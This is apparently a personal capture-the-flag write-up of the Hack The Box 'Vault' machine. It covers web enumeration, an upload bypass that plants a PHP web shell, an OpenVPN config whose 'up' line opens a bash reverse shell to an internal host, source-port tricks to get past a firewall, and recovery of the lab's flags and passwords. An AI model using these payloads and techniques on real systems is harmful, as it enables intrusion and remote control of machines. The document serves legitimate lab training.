Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Title tags
Vault
Linux

Recon Phase

Nmap

dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV 10.10.10.109                                                      
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:48 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http       Apache httpd 2.4.18 ((Ubuntu))
1234/tcp open  tcpwrapped
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.33 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$   

Again we find SSH and HTTP

HTTP Enumeration

A bit of hand enumertion based on the site shows that there is something in the "Sparklays" url

WE also end up with login.php as a Access denied.

Lets see what the http Enumeation scripts bring up....

dang@dang-laptop ~/Documents/HTB/Frolic$ nmap -sV --script=http-enum 10.10.10.109                                   
Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-05 18:50 GMT
Nmap scan report for 10.10.10.109
Host is up (0.024s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.50 seconds
dang@dang-laptop ~/Documents/HTB/Frolic$    

Looking at the page, we see a search term sparkleys, Perhaps something lives there... The page is place holder text but it goves us a foothold with Nikto. However, Nikto shows....

$ nikto -host http://10.10.10.109/sparklays/ 
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=config: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-29786: /sparklays/admin.php?en_log_id=0&action=users: EasyNews from http://www.webrc.ca version 4.3 allows remote admin access. This PHP file should be protected.
+ OSVDB-3092: /sparklays/admin.php: This might be interesting...
+ /sparklays/login.php: Admin login page/section found.
+ 7499 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time:           2019-03-10 22:47:12 (GMT0) (491 seconds)

Admin page, but no creds

gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt

Try Gobuster with the Common word lis

user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays -t 50 -w common.txt -x .php,.html,.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.109/sparklays/
[+] Threads      : 50
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : php,html,txt
[+] Timeout      : 10s
=====================================================
2019/03/10 23:05:47 Starting gobuster
=====================================================
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htaccess (Status: 403)
/.htpasswd.txt (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.hta (Status: 403)
/.hta.php (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/admin.php (Status: 200)
/admin.php (Status: 200)
/design (Status: 301)
/login.php (Status: 200)
=====================================================
2019/03/10 23:06:38 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$ 

And FFS Learning More about CTF Here. Lets start Enumerating Deeper.

Lets also Enumerate the design folder....

user@kali:/usr/share/wordlists/dirb$ gobuster -u http://10.10.10.109/sparklays/design -t 50 -w common.txt -x .php,.html,.txt

=====================================================
Gobuster v2.0.1              OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.109/sparklays/design/
[+] Threads      : 50
[+] Wordlist     : common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Extensions   : html,txt,php
[+] Timeout      : 10s
=====================================================
2019/03/10 23:12:15 Starting gobuster
=====================================================
/.hta (Status: 403)
/.hta.html (Status: 403)
/.hta.txt (Status: 403)
/.htaccess (Status: 403)
/.hta.php (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.txt (Status: 403)
/design.html (Status: 200)
/uploads (Status: 301)
=====================================================
2019/03/10 23:13:07 Finished
=====================================================
user@kali:/usr/share/wordlists/dirb$ 

Nice we get evntually get a HTML page Going to

http://10.10.10.109/sparklays/design/changelogo.php Lets us upload images We can then find them in http://10.10.10.109/sparklays/design/uploads/foo.jpg

So We can upload .jpg, but they come with errors. Google for stuff on Uplaod Bypass:

Examples like this Fails.

<img src="http://10.10.10.109/sparklays/design//uploads/foo.php.jpg" alt="The image “http://10.10.10.109/sparklays/design//uploads/foo.php.jpg” cannot be displayed because it contains errors.">

Lets work through the other file types suggested:

[x] png [x] bmp [./] jpg [x] txt [x] php [/] php5

SO I can upload and run PHP scripts :)

And it looks like PHPinfo can be uploaded. (Alghough it looks screwey)

Getting a Shell

This time I felt like doing something slightly different to the

cat foo.php5
<?php
system($_GET['evil']);
?>

Then going to http://10.10.10.109/sparklays/design/uploads/foo.php5?evil=ls

Gives me a Dirlisting :)

Possible Password in:

?evil=cat /home/dave/Desktop/key : itscominghome

And also in dave/Desktop/ssh

dave Dav3therav3123

And in Servers

DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x

However, WHERE IS THE DAMN USER.TXT???*

So this would imply that the Servers above are avaliable interenally.

SSH into Dave

Looks like we found SSH credentials in the recon above.

  • user: dave
  • password: Dav3thetav123

This allows us to log into the Server above.

A Maze of tunnels all alike

We found a list of servers, in ~/dave/Servers

DNS + Configurator - 192.168.122.4
Firewall - 192.168.122.5
The Vault - x

Looks like we are going to have to traverse.

https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html https://0xdf.gitlab.io/2018/06/10/intro-to-ssh-tunneling.html

Nice Oneliner for port scanning here to check the Hosts I have found.

dave@ubuntu:~/.ssh$ for i in $(seq 1 254); do (ping -c 1 192.168.122.${i} | grep "bytes from" &); done;
64 bytes from 192.168.122.1: icmp_seq=1 ttl=64 time=0.065 ms
64 bytes from 192.168.122.4: icmp_seq=1 ttl=64 time=0.758 ms
64 bytes from 192.168.122.5: icmp_seq=1 ttl=64 time=0.881 ms
dave@ubuntu:~/.ssh$ 

What else is open (z == report open ports, rather than open them)

nc -zv 192.168.122.4 1-1023

DNS Server

We know that the DNS server has a http port

Setup some tunnels to forward this

$dave ssh -L 4242:192.168.122.4:80 dave@10.10.10.109
$dang ssh -L 4242:localhost:4242 dave@10.10.10.109

NOTE: I Realise I could probably cut out a setp by forwarding 122.4 to My Server.

Main Page shows a DNS config, and OPpen VPN checker

Enumerate The rest of the web site with gobuster

/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/index.php (Status: 200)
/notes (Status: 200)
/server-status (Status: 403)

notes file contains

chmod 123.ovpn and script.sh to 777

And we also find 123.ovpn

remote 192.168.122.1
dev tun
nobind
script-security 2
up "/bin/bash -c 'bash -i >& /dev/tcp/192.168.122.1/2323 0>&1'"

and script.sh

#!/bin/bash
sudo openvpn 123.ovpn

This may also be our way forward...

https://medium.com/tenable-techblog/reverse-shell-from-an-openvpn-configuration-file-73fd8b1d38da

So the Open VPN stuff will forward a shell to port 2323 to 192.168.122.1 Thats a really nifty command :P

So Lets see if the Damn Configuurator on the website does works

Upload the 123.ovpn file

HAve a netcat listener on the Dave (port 2323)

Last login: Thu Mar 14 15:41:03 2019 from 10.10.10.109
dave@ubuntu:~$ nc -nvlp 2323
Listening on [0.0.0.0] (family 0, port 2323)
Connection from [192.168.122.4] port 2323 [tcp/*] accepted (family 2, sport 58896)
bash: cannot set terminal process group (1093): Inappropriate ioctl for device
bash: no job control in this shell
root@DNS:/var/www/html# 

And it gives us User Flag !!!

root@DNS:/home/dave# cat user.txt
cat user.txt
a4947faa8d4e1f80771d34234bd88c73

I Also think I have the SSH password So I dont need to repeat myself Dave is also Sudo, so happy days there, if we lose the connection..

  • user: dave
  • user: dav3gerous567

On the DNS Box

Thrutching around on the DNS box.

Not a huge abount here in terms of files

In /var/www/DNS we have

auto ens3
iface ens3 inet static
address 192.168.122.4
netmask 255.255.255.0
up route add -net 192.168.5.0 netmask 255.255.255.0 gw 192.168.122.5
up route add -net 192.168.1.0 netmask 255.255.255.0 gw 192.168.1.28

Which gives us a clue as to the addresses we are lookin at.

We also have Alex (Who prob set this up...), with stuff in the .bash_history

ping 192.168.5.2
su root
nc -lvp 8888
exit

If we take a look, at x.5.2 we get something interesting.

Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:18 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0030s latency).
Not shown: 998 filtered ports
PORT     STATE  SERVICE VERSION
53/tcp   closed domain
4444/tcp closed krb524

I think the Firewall is blocking stuff....

Poking a round more, In Auth.log there is

Sep  2 15:07:51 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/nmap 192.168.5.2 -Pn --source-port=4444 -f
Sep  2 15:07:51 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep  2 15:08:55 DNS sudo: pam_unix(sudo:session): session closed for user root
Sep  2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session opened for user root by (uid=0)
Sep  2 15:09:01 DNS CRON[2459]: pam_unix(cron:session): session closed for user root
Sep  2 15:10:20 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 1234 --sh-exec ncat 192.168.5.2 987 -p 53
Sep  2 15:10:20 DNS sudo: pam_unix(sudo:session): session opened for user root by dave(uid=0)
Sep  2 15:10:34 DNS sudo:     dave : TTY=pts/0 ; PWD=/home/dave ; USER=root ; COMMAND=/usr/bin/ncat -l 3333 --sh-exec ncat 192.168.5.2 987 -p 53

We can nmap the server and if we pretend we are from 4444. We find somehting that is open.

root@DNS:/var/log# nmap 192.168.5.2 -Pn --source-port=4444 -f

Starting Nmap 7.01 ( https://nmap.org ) at 2019-03-14 23:28 GMT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Nmap scan report for Vault (192.168.5.2)
Host is up (0.0035s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE
987/tcp open  unknown

Rough Idea of what is going on with NCAT

  • Listen on port 1234
  • Then start a second NC to port 987 with -p (source port) 53
  • ssh2 on 4444??

We can confirm this.... Looks like

root@DNS:/var/log# ncat -nv 192.168.5.2 987 -p 53
Ncat: Version 7.01 ( https://nmap.org/ncat )
Ncat: Connected to 192.168.5.2:987.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.4
ls
Protocol mismatch.
whoami

So are we tunneling SSH through the server??

ncat -nlv 1234 --sh-exec "/usr/bin/ncat -nv 192.168.5.2 987 -p 53"

Then we SSH in to Vault (via localhost) using SSH on port 1234

ssh dave@127.0.0.1 -P 1234

Our Next issue is being stuck in rbash FFS.

We can escape that using Less !/bin/bash.

If we kill the connection we can do a reverse SCP to grab the Encoded file

dave@DNS:~$ scp -P 1234 dave@127.0.0.1:/home/dave/root.txt.gpg .
The authenticity of host '[127.0.0.1]:1234 ([127.0.0.1]:1234)' can't be established.
ECDSA key fingerprint is SHA256:Wo70Zou+Hq5m/+G2vuKwUnJQ4Rwbzlqhq2e1JBdjEsg.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '[127.0.0.1]:1234' (ECDSA) to the list of known hosts.
dave@127.0.0.1's password: 

Store as a Hexdump (as a backup)

root@DNS:/home/dave# hexdump root.txt.gpg 
0000000 0285 030c 78c7 10c6 ebd1 031f 1001 a000
0000010 ea98 1ad3 6e36 497e 8d7d e8d0 1543 3966
0000020 5030 c9ae cc3d 1214 51bd 4c35 f27d 354e
0000030 e1a0 b65d 31e8 3c52 4907 719f 15f4 b23d
0000040 7a98 a1f7 94e1 4fa9 463b ecae 8537 1acb
0000050 158f d1b8 27d8 a170 4f3f ff05 b92f 3321
0000060 a512 b665 2af0 58df 6dd0 547a 0d48 c580
0000070 a384 f5dd 088a 0809 c53d 4d01 0937 7602
0000080 d09c 2643 505e cd10 26d0 51bc fb14 51d0
0000090 ca91 0d49 582a c557 21b6 fe07 c97e d7e1
00000a0 5c88 9b73 6557 5706 63d2 2eed 185c 5256
00000b0 e36a 2918 7c57 9ce7 eb9a 4895 260a 2aa9
00000c0 ad86 db62 44f2 be00 9754 3959 cf6a 6b47
00000d0 7c53 f729 99e3 2cf1 14ad f125 b934 ba34
00000e0 de02 6965 0fdf 5f74 d842 2087 47dc c73e
00000f0 353f 74df 1df3 e133 34bd f545 8ecd e91c
0000100 f5ca 13b3 2d9d 54ca b6c1 8a78 7bd7 305e
0000110 ef80 7650 d7dc ed1d e2e9 602c 12a4 dab0
0000120 4656 f261 b886 220f ef06 f1c6 54a8 82c3
0000130 974e 7eac cfa9 d1d5 105e 49c1 c299 327b
0000140 d13d 1b69 67c4 389c 361e 0370 1ab0 874b
0000150 7472 e385 9787 3e0d 62b4 615f bbe9 65d1
0000160 1051 7f17 f5f7 bee7 c69c e596 4fbe 6c9d
0000170 6fc6 c2f3 44e2 64f7 9637 2861 a0a5 9a5e
0000180 c3e6 0cb0 82ed fa2f a6a2 0570 3f3e b614
0000190 6b18 2708 8f10 d18a 6c1f 7ade 321e f8f5
00001a0 9b77 b771 0fed f694 6053 3ca6 d2e3 d57c
00001b0 f809 acdd 6fc4 ce52 b762 291c 068f 37b1
00001c0 b6aa 59ab 7b31 e150 2c3c 00da 4b78 b54f
00001d0 ee9e a19d d4c5 d7a3 e023 f479 27b3 467f
00001e0 d810 2309 db57 314c 331a 243c b63e 23b8
00001f0 2263 2124 8115 d599 dadb 1c11 2bf6 6b98
0000200 c71f 528b 1c90 b4ba b795 6fe3 f3ec d2c7
0000210 0164 4470 ba76 d10b afeb 92b1 e756 2728
0000220 f69c d290 3e80 bf74 4971 7381 9d73 9978
0000230 c54c f3d7 3341 722e fc6b 0cf7 3620 8d02
0000240 ee2c 99b0 6921 54a5 a667 c462 01f8 0868
0000250 a04a 94fc d4bd 66de 1656 904f 167c 5fe9
0000260 0b78 0513 7cff 4c6a a9c2 17cc 11dd b41a
0000270 6630 8f22 00df                         
0000275

We need the Secret Key

root@DNS:/home/dave# gpg root.txt.gpg 
gpg: directory `/root/.gnupg' created
gpg: new configuration file `/root/.gnupg/gpg.conf' created
gpg: WARNING: options in `/root/.gnupg/gpg.conf' are not yet active during this run
gpg: keyring `/root/.gnupg/secring.gpg' created
gpg: keyring `/root/.gnupg/pubring.gpg' created
gpg: encrypted with RSA key, ID D1EB1F03
gpg: decryption failed: secret key not available
root@DNS:/home/dave# 

Check what keys are avaialbe:

Not on DNS server

root@DNS:/var/log# gpg --list-secret-keys
gpg: /root/.gnupg/trustdb.gpg: trustdb created
root@DNS:/var/log# gpg --list-secret-keys

Key does appear to be on The first Server :) And the Passphrase of "itscominghome" that we found about 2 days ago in the Recon part

dave@ubuntu:/tmp$ gpg root.txt.gpg 

You need a passphrase to unlock the secret key for
user: "david <dave@david.com>"
4096-bit RSA key, ID D1EB1F03, created 2018-07-24 (main key ID 0FDFBFE4)

gpg: encrypted with 4096-bit RSA key, ID D1EB1F03, created 2018-07-24
      "david <dave@david.com>"
dave@ubuntu:/tmp$ ls
root.txt      systemd-private-215c6f7f4c04468996eb09264769d510-colord.service-fzn51m        systemd-private-215c6f7f4c04468996eb09264769d510-systemd-timesyncd.service-Cstw1F  vmware-root
root.txt.gpg  systemd-private-215c6f7f4c04468996eb09264769d510-rtkit-daemon.service-mNFDbm  VMwareDnD
dave@ubuntu:/tmp$ cat root.txt
ca468370b91d1f5906e31093d9bfe819
dave@ubuntu:/tmp$ 

RABBIT: Hidden text file

There is also a .root.txt.swp

Turns out its a Vi Backup File May be able to recover it with vim -r (Doesnt work) However, aparently the file is being edited by dave with pricess 4872. Can we grab that process